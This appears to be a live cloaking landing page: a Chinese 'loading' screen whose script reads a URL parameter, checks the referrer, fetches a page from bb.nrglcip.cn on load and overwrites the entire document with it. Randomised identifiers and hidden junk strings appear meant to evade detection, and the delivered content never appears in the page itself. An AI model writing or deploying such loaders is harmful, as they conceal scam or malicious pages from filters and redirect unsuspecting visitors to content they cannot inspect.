<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .u3gAoe2 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .u3gAoe2 .TFqEFyMSxtl {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .u3gAoe2 .content {
            line-height: 50px;
            text-align: center
        }

        .u3gAoe2 .img {
            width: 100%
        }

        .u3gAoe2 .ZOAnnr {
            text-align: center
        }

        .u3gAoe2 .ZOAnnr span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .u3gAoe2 .ZOAnnr span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .u3gAoe2 .ZOAnnr span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .u3gAoe2 .ZOAnnr span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .u3gAoe2 .ZOAnnr span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .u3gAoe2 .ZOAnnr span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .u3gAoe2 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wCdvY1jS1r2(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bnkcn = wCdvY1jS1r2('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bnkcn +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bnkcn +".html?a=share";
		}
		
        zxRKIbCCFa=url+"#"+new Date().getTime();
        zxRKIbCCFa && function() {
            $.get(zxRKIbCCFa, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >yAQA2NBkpelQHiua0AYnvCtVw89</h1>
<img  src='' style='display:none'>
<span style='display:none'>KONzflRSkY4mCjwQuBVcvcG4tZJOctQjz1hJQ7dHec8qoZnNV0ZRgpvtI9Tq27b9mopjFjvygKcm</span><div class="u3gAoe2">
    <div class="TFqEFyMSxtl">
        <div class="ZOAnnr">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>xVXiGsIOWsD1vEi3WrOpCjI4wWKUejwTgUNUsu1MgRt7imrbFK9lwP3uyKBYvfEe</a>
<a  href='#' style='display:none'>xVXiGsIOWsD1vEi3WrOpCjI4wWKUejwTgUNUsu1MgRt7imrbFK9lwP3uyKBYvfEe</a>
<img  src='' style='display:none'>
<span style='display:none'>dcUKxr7wR4Os7fNCjixF56aU6hk5NsHTw0ufTDU4Au309W39VnJn5QIMJJPL0YwMnB8nNfNqh</span>
<li style='display:none' >ESO1GXJTF0TX4kI8yXtgfg0dwjQakzM0eSqCOf7LPeafeIIKNT</li></body>
</html>